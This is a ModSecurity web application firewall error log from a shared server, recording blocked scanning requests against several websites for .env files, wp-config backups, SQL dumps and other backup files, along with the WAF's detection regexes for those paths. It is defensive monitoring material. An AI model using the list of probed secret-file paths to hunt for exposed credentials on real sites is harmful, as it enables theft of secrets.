[Tue May 26 19:57:14.347300 2026] [security2:error] [pid 93868:tid 94137] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/app/.env"] [unique_id "ahWtwkqK9k_ZUB2Vp25jKAAB-Tw"]
[Tue May 26 19:57:14.477957 2026] [security2:error] [pid 93868:tid 94271] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/restaurant-app/frontend/.env"] [unique_id "ahWtwkqK9k_ZUB2Vp25jLQAAAZw"]
[Tue May 26 19:57:14.632915 2026] [security2:error] [pid 93868:tid 94269] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/debug/.env"] [unique_id "ahWtwkqK9k_ZUB2Vp25jLwAAAZo"]
[Tue May 26 19:57:14.742835 2026] [security2:error] [pid 93868:tid 94134] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/src/.env"] [unique_id "ahWtwkqK9k_ZUB2Vp25jNgAB6Do"]
[Tue May 26 19:57:14.787855 2026] [security2:error] [pid 93868:tid 94319] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/backup/wp-config.bak"] [unique_id "ahWtwkqK9k_ZUB2Vp25jNwAAAcw"]
[Tue May 26 19:57:15.099452 2026] [security2:error] [pid 93868:tid 94356] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/babel.config.mjs.bak"] [unique_id "ahWtw0qK9k_ZUB2Vp25jQgAAAfE"]
[Tue May 26 19:57:15.131909 2026] [security2:error] [pid 93868:tid 94148] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/backend/.env"] [unique_id "ahWtw0qK9k_ZUB2Vp25jQwAB80I"]
[Tue May 26 19:57:15.357090 2026] [security2:error] [pid 93868:tid 94265] [client 114.119.157.37:49845] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/wp-content/uploads/2017/11/Gordon-castle-Inverness.jpg"] [unique_id "ahWtw0qK9k_ZUB2Vp25jSgAAAZY"], referer: http://haddingtonwines.com/products/gordon-castle-inverness
[Tue May 26 19:57:15.460757 2026] [security2:error] [pid 93868:tid 94334] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtw0qK9k_ZUB2Vp25jQAAAAds"]
[Tue May 26 19:57:15.498146 2026] [security2:error] [pid 93868:tid 94174] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/api/.env"] [unique_id "ahWtw0qK9k_ZUB2Vp25jTgAB3VA"]
[Tue May 26 19:57:15.876397 2026] [security2:error] [pid 93868:tid 94324] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/symfony-app/frontend/.env"] [unique_id "ahWtw0qK9k_ZUB2Vp25jYgAAAdE"]
[Tue May 26 19:57:16.011980 2026] [security2:error] [pid 93868:tid 94167] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/config.php"] [unique_id "ahWtw0qK9k_ZUB2Vp25jZwABkUw"]
[Tue May 26 19:57:16.442968 2026] [security2:error] [pid 93868:tid 94199] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/settings.php"] [unique_id "ahWtxEqK9k_ZUB2Vp25jdwABlF4"]
[Tue May 26 19:57:16.498777 2026] [security2:error] [pid 93868:tid 94340] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-backup.sql"] [unique_id "ahWtxEqK9k_ZUB2Vp25jegAAAeE"]
[Tue May 26 19:57:16.756636 2026] [security2:error] [pid 93868:tid 94191] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/wp-config.php"] [unique_id "ahWtxEqK9k_ZUB2Vp25jgwABmlo"]
[Tue May 26 19:57:16.963458 2026] [security2:error] [pid 93868:tid 94289] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/site.bak"] [unique_id "ahWtxEqK9k_ZUB2Vp25jkQAAAa4"]
[Tue May 26 19:57:17.060069 2026] [security2:error] [pid 93868:tid 94066] [remote 171.235.163.210:55800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.163.235.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtxEqK9k_ZUB2Vp25jiAABrBY"]
[Tue May 26 19:57:17.117931 2026] [security2:error] [pid 93868:tid 94356] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/httpd/.env"] [unique_id "ahWtxUqK9k_ZUB2Vp25jmAAAAfE"]
[Tue May 26 19:57:17.428652 2026] [security2:error] [pid 93868:tid 94352] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/etc/env.php.bak"] [unique_id "ahWtxUqK9k_ZUB2Vp25jpQAAAe0"]
[Tue May 26 19:57:17.489389 2026] [security2:error] [pid 93576:tid 93796] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtxWDRMqfxdEDkoszhowAAAFQ"]
[Tue May 26 19:57:17.910720 2026] [security2:error] [pid 93868:tid 94008] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/config.php.bak"] [unique_id "ahWtxUqK9k_ZUB2Vp25juAABwwg"]
[Tue May 26 19:57:18.206519 2026] [security2:error] [pid 93868:tid 94301] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/plugins/*/.env"] [unique_id "ahWtxkqK9k_ZUB2Vp25jxgAAAbo"]
[Tue May 26 19:57:18.361446 2026] [security2:error] [pid 93868:tid 94330] [client 185.177.72.53:11594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/secrets/wp-config.bak"] [unique_id "ahWtxkqK9k_ZUB2Vp25jzQAAAdc"]
[Tue May 26 19:57:19.453789 2026] [security2:error] [pid 93868:tid 94273] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/register.php.old"] [unique_id "ahWtx0qK9k_ZUB2Vp25j-gAAAZ4"]
[Tue May 26 19:57:19.612356 2026] [security2:error] [pid 93868:tid 94285] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mongo.php.bak"] [unique_id "ahWtx0qK9k_ZUB2Vp25kBAAAAao"]
[Tue May 26 19:57:19.714581 2026] [security2:error] [pid 93868:tid 94227] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/wp-config.php.backup"] [unique_id "ahWtx0qK9k_ZUB2Vp25kCwAB0G0"]
[Tue May 26 19:57:19.873750 2026] [security2:error] [pid 93576:tid 93703] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/.env.backup"] [unique_id "ahWtx2DRMqfxdEDkoszh0gAAFXk"]
[Tue May 26 19:57:20.250209 2026] [security2:error] [pid 93868:tid 94275] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/themes/*/.env"] [unique_id "ahWtyEqK9k_ZUB2Vp25kIAAAAaA"]
[Tue May 26 19:57:20.408788 2026] [security2:error] [pid 93868:tid 94002] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/wp-config.php.bak"] [unique_id "ahWtyEqK9k_ZUB2Vp25kKAABmwM"]
[Tue May 26 19:57:20.538553 2026] [security2:error] [pid 93576:tid 93706] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/.env.old"] [unique_id "ahWtyGDRMqfxdEDkoszh1wAAens"]
[Tue May 26 19:57:20.729687 2026] [security2:error] [pid 93868:tid 94362] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cluster/.env"] [unique_id "ahWtyEqK9k_ZUB2Vp25kOgAAAfc"]
[Tue May 26 19:57:20.764782 2026] [security2:error] [pid 93868:tid 94384] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtyEqK9k_ZUB2Vp25kJQAAAg0"]
[Tue May 26 19:57:20.879189 2026] [security2:error] [pid 93868:tid 94256] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/wp-config.php.old"] [unique_id "ahWtyEqK9k_ZUB2Vp25kQQABtn8"]
[Tue May 26 19:57:20.887552 2026] [security2:error] [pid 93868:tid 94339] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public/assets/.env"] [unique_id "ahWtyEqK9k_ZUB2Vp25kQgAAAeA"]
[Tue May 26 19:57:21.045989 2026] [security2:error] [pid 93868:tid 94360] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tickets/.env"] [unique_id "ahWtyUqK9k_ZUB2Vp25kSgAAAfU"]
[Tue May 26 19:57:21.107297 2026] [security2:error] [pid 93576:tid 93707] [remote 123.30.233.13:44188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtyGDRMqfxdEDkoszh2wAAeXw"]
[Tue May 26 19:57:21.172486 2026] [security2:error] [pid 93576:tid 93708] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/.env.bak"] [unique_id "ahWtyWDRMqfxdEDkoszh3gAASH0"]
[Tue May 26 19:57:21.200275 2026] [security2:error] [pid 93868:tid 94103] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/wp-config.php.save"] [unique_id "ahWtyUqK9k_ZUB2Vp25kTgAB_yo"]
[Tue May 26 19:57:21.203686 2026] [security2:error] [pid 93868:tid 94353] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin-app/.env"] [unique_id "ahWtyUqK9k_ZUB2Vp25kTwAAAe4"]
[Tue May 26 19:57:21.433358 2026] [security2:error] [pid 93576:tid 93600] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/config/.env"] [unique_id "ahWtyWDRMqfxdEDkoszh4AAABBU"]
[Tue May 26 19:57:21.652364 2026] [security2:error] [pid 93868:tid 94061] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/wp-config.php.swp"] [unique_id "ahWtyUqK9k_ZUB2Vp25kaAACBhQ"]
[Tue May 26 19:57:21.724401 2026] [security2:error] [pid 93576:tid 93605] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/app/.env"] [unique_id "ahWtyWDRMqfxdEDkoszh4wAAYBo"]
[Tue May 26 19:57:21.996447 2026] [security2:error] [pid 93576:tid 93606] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/src/.env"] [unique_id "ahWtyWDRMqfxdEDkoszh5QAAZxs"]
[Tue May 26 19:57:22.002282 2026] [security2:error] [pid 93868:tid 94319] [client 185.177.72.53:35634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/tmp/env.bak"] [unique_id "ahWtyUqK9k_ZUB2Vp25kcwAAAcw"]
[Tue May 26 19:57:22.004654 2026] [security2:error] [pid 93868:tid 94059] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/wp-config.php.txt"] [unique_id "ahWtykqK9k_ZUB2Vp25kdAABpBM"]
